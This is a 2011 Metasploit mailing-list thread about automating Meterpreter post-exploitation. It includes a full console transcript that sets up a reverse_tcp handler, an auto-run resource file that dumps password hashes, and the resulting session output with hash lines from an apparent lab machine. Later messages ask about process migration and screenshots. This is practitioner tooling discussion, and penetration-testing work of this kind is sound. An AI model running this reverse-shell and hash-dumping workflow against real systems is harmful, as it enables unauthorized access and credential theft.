Metasploit mailing list archives
Re: News from Metasploit 4.
From: Richard Miles <richard.k.miles () googlemail com>
Date: Sat, 27 Aug 2011 15:49:50 -0500
Hi Carlos

Yes, but it failed. What worked was run post/windows/manage/migrate, but it took a long time to finish (around 10 minutes). Very uncommon. Also, at the end of migrate my meterpreter EXE is still on the list of processes. Once it was migrated, should it not be dropped? If not, is there a way to do it with migrate?

About the screenshot, I tried to use espia and screengrab, but it also calls my lynx when it finishes, which is very bad, because until I hit "C" for cancel the rest of the script does not run. Any idea about this?

Thanks Carlos

On Sat, Aug 27, 2011 at 3:37 PM, Carlos Perez <carlos_perez () darkoperator com> wrote:

Did you try adding to the resource file

Run migrate -f

Cheers,
Carlos Perez
Sent from My Mobile Phone

On Aug 27, 2011, at 3:15 PM, Richard Miles <richard.k.miles () googlemail com> wrote:

Hi Carlos

I followed your step by step and it worked, I'm really a fool. Thanks a lot.

By the way, do you know if there is reverse_http(s) for Windows 64 bits?

Thanks, really thanks.

On Sat, Aug 27, 2011 at 1:50 PM, Carlos Perez <dark0perator () pauldotcom com> wrote:

works for me

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(handler) > set AutoRunScript multi_console_command -rc /tmp/sample.rc
AutoRunScript => multi_console_command -rc /tmp/sample.rc
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -x -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler...
msf exploit(handler) > cat /tmp/sample.rc
[*] exec: cat /tmp/sample.rc
sysinfo
getuid
load priv
hashdump
run checkvm
msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.115:1543) at 2011-08-27 14:49:29 -0400
[*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.115:1543) processing AutoRunScript 'multi_console_command -rc /tmp/sample.rc'
[*] Running Command List ...
[*] Running command sysinfo
Computer : CARLOS-192FCD91
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
[*] Running command getuid
Server username: CARLOS-192FCD91\Administrator
[*] Running command load priv
[-] The 'priv' extension has already been loaded.
[*] Running command hashdump
Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
[*] Running command run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine

On Aug 26, 2011, at 4:16 PM, Richard Miles wrote:

Hi HD Moore,

Thanks for the links.

Does the new reverse_http work in 64 bit Windows? How should I call it?

Any follow-up on the other 2 questions in the e-mail?

Thanks

On Fri, Aug 26, 2011 at 9:19 AM, HD Moore <hdm () metasploit com> wrote:

The Metasploit blog includes quite a bit of information on 4.0:
https://community.rapid7.com/community/metasploit?view=blog

You can also see the release notes:
https://community.rapid7.com/docs/DOC-1496

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework